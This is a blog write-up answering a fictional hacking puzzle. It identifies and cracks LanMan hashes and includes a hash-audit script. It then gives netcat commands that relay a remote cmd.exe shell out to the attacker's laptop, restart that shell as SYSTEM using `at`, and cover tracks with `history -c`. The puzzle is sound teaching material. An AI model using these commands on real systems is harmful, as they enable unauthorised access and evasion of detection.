The Christmas (Hacking) Story challenge is over and unfortunately I didn’t win :), so I am publishing my response:
What is interesting about the files that Ralphie could see on the lamp server?
nc is most probably netcat (http://netcat.sourceforge.net/), the “network swiss army knife” (the fact that it’s executable, as can be seen from the directory listing, is another indication that it’s netcat). The empty file is very handy, because (a) it’s empty, so at the end it will be easier to restore its contents (see the answer to question 4) and (b) nc can’t pass parameters to the executable it pipes to, so we need a file to store those parameters (see answer 3).
What is the significance of the Annie cyphertext?
They are LanMan hashes, which give a hint to the solution and also contain a subliminal message 😉
62b7cd49704064bdaad3b435b51404ee DRINK
97e61e27b7599adfaad3b435b51404ee MORE
04baf1615a04764eaad3b435b51404ee OVAL
c90b9e4f1b743404aad3b435b51404ee TINE
4eaf812dafa29cf7aad3b435b51404ee BUY
aab65b7207a5faf9aad3b435b51404ee COUNTER
9d82cdff56b35758aad3b435b51404ee HACK
e414a2208c930d79aad3b435b51404ee RELOADE
eced132790cb280baad3b435b51404ee USE
f6f2790b99137838aad3b435b51404ee NET
bbc70d3c8f0049a5aad3b435b51404ee CAT
a5cd742a1ff7dd5aaad3b435b51404ee RELAY
They can be cracked either by dictionary attack or using rainbow tables (http://ophcrack.sourceforge.net/). Another interesting method to crack them would be the work of Dan Moniz and Patrick Stach (check out their presentation at http://www.shmoocon.org/2006/presentations.html), however they haven’t released any public material (yet).
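An added check, not part of the original answer: the tail aad3b435b51404ee that every hash above shares is the LM hash of an empty 7-byte half, which is what identifies them as LanMan hashes and tells a defender, before any cracking starts, that every password is at most 7 characters long. The Python script below (written for this article) parses the list and verifies that against the plaintexts; it also reads out the hidden message.

```python
import re
# Well-known LM hash of an empty (all-NUL) 7-byte half. If the second half of an LM
# hash equals it, the password is at most 7 characters long.
EMPTY_HALF = "aad3b435b51404ee"

# The twelve hash/plaintext pairs quoted in the write-up, one pair per line.
ANNIE_CYPHERTEXT = """
62b7cd49704064bdaad3b435b51404ee DRINK
97e61e27b7599adfaad3b435b51404ee MORE
04baf1615a04764eaad3b435b51404ee OVAL
c90b9e4f1b743404aad3b435b51404ee TINE
4eaf812dafa29cf7aad3b435b51404ee BUY
aab65b7207a5faf9aad3b435b51404ee COUNTER
9d82cdff56b35758aad3b435b51404ee HACK
e414a2208c930d79aad3b435b51404ee RELOADE
eced132790cb280baad3b435b51404ee USE
f6f2790b99137838aad3b435b51404ee NET
bbc70d3c8f0049a5aad3b435b51404ee CAT
a5cd742a1ff7dd5aaad3b435b51404ee RELAY
"""

def split_lm(lm_hash):
    """Split a 32-hex-digit LM hash into its two 16-hex-digit DES halves."""
    h = lm_hash.strip().lower()
    if not re.fullmatch(r"[0-9a-f]{32}", h):
        raise ValueError("not a 32-hex-digit LM hash: %r" % lm_hash)
    return h[:16], h[16:]

def audit_lm_hash(lm_hash):
    """What the structure alone reveals: 'empty', 'short' (1-7 chars) or 'long' (8-14)."""
    first, second = split_lm(lm_hash)
    if first == EMPTY_HALF and second == EMPTY_HALF:
        return "empty"
    return "short" if second == EMPTY_HALF else "long"

def parse_pairs(text):
    """Parse 'hash WORD' lines into (hash, word) tuples."""
    return [tuple(line.split()) for line in text.strip().splitlines()]

def audit_challenge_list(text=ANNIE_CYPHERTEXT):
    """Return {word: verdict}, checking every verdict against the known plaintext length."""
    results = {}
    for h, word in parse_pairs(text):
        verdict = audit_lm_hash(h)
        expected = "short" if len(word) <= 7 else "long"
        if verdict != expected:
            raise ValueError("%s: hash says %s, plaintext says %s" % (word, verdict, expected))
        results[word] = verdict
    return results

def hidden_message(text=ANNIE_CYPHERTEXT):
    """The plaintexts read in order spell out the 'subliminal message'."""
    return " ".join(word for _, word in parse_pairs(text))
```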
What command could Ralphie e-mail to the lamp to get access to the command shell on the furnace server from the kid’s network to read the Christmas list? What should Ralphie do on his own laptop for this to work? Assume that you cannot alter the configuration of the lamp or get any higher privileges on that machine, nor can you reconfigure the firewall.
First he should open up a listener on port 80 or on port 443. He can do this by using netcat (there are versions of netcat for nearly every operating system, so it really doesn’t matter what he’s running on the laptop). The command would be:
nc -l -p 80 (or 443)
If he’s running a Unix variant (Linux, BSD, Mac OS, etc.), he needs root privileges to open such a low port. We assume he has root privileges on his own laptop, and he would do:
sudo nc -l -p 80
Now he needs to create the relay between his computer and the protected Windows server. First he should write a little script into the chimney file (using commands sent via e-mail to the lamp server; each line represents a separate command):
echo '#!/bin/bash' > chimney
echo ./nc 10.10.10.10 2222 >> chimney
chmod +x chimney
(the shebang line must be quoted, otherwise the shell treats everything after the # as a comment and writes nothing to the file; instead of the second line he could use echo telnet 10.10.10.10 2222 >> chimney, as telnet is present in 99.9% of the Linux distributions, but just to be cautious we use netcat)
Now we are ready to create the tunnel. Issue the following command through e-mail:
./nc 10.11.11.11 80 -e ./chimney
We should then get, on the kid’s computer, a connection to the shell running on the Windows server, and we can check out the text files.
How can Ralphie make the activities you describe above less likely to be detected by his Old Man?
After we disconnect from the shell it will die on the Windows server (meaning that it won’t be accessible afterwards) unless it was launched from a batch file like:
:start_shell
nc -l -p 2222 -e cmd.exe
goto start_shell
So the first thing we need to do is to restart the shell. This can be done easily by creating a batch file (c:\nc.bat for example), with the following content:
start c:\nc.exe -l -p 2222 -e cmd.exe
del c:\nc.bat
(by doing an echo … >> c:\nc.bat from the shell, for example) and scheduling it for a moment shortly after we disconnect, using the at command (for example, if we are ready to disconnect at 13:30, we execute the command at 13:32 “c:\nc.bat” and then disconnect). The start on the first line is necessary so that we don’t wait for netcat to exit before we can delete the batch file. The scheduled job is deleted automatically after it runs, so we don’t have to worry about that. The shell will run under the SYSTEM account, so it’s not likely that an access denied error message will appear when the Old Man connects to it and tries to execute commands (which could raise his suspicion). Then again, with advanced system monitoring tools like Process Explorer from SysInternals (now Microsoft) – http://www.microsoft.com/technet/sysinternals/utilities/ProcessExplorer.mspx – one can see two suspicious things:
- the process ID will be different (if one knew the original one)
- the nc process will be without a parent (as the parent dies after starting it). It may be that the original nc had a well-defined parent.
Windows has nothing similar to bash history, so we don’t need to worry about it. However we should cover our tracks on the Lamp server by issuing the following command through e-mail:
chmod -x chimney
cat /dev/null > chimney
history -c
(the last line clears the history file of the shell that executed the commands, hiding one of the possible sources from which the offending IP address could be discovered. However, an empty history file is suspicious in itself, and the e-mails themselves may be logged somewhere)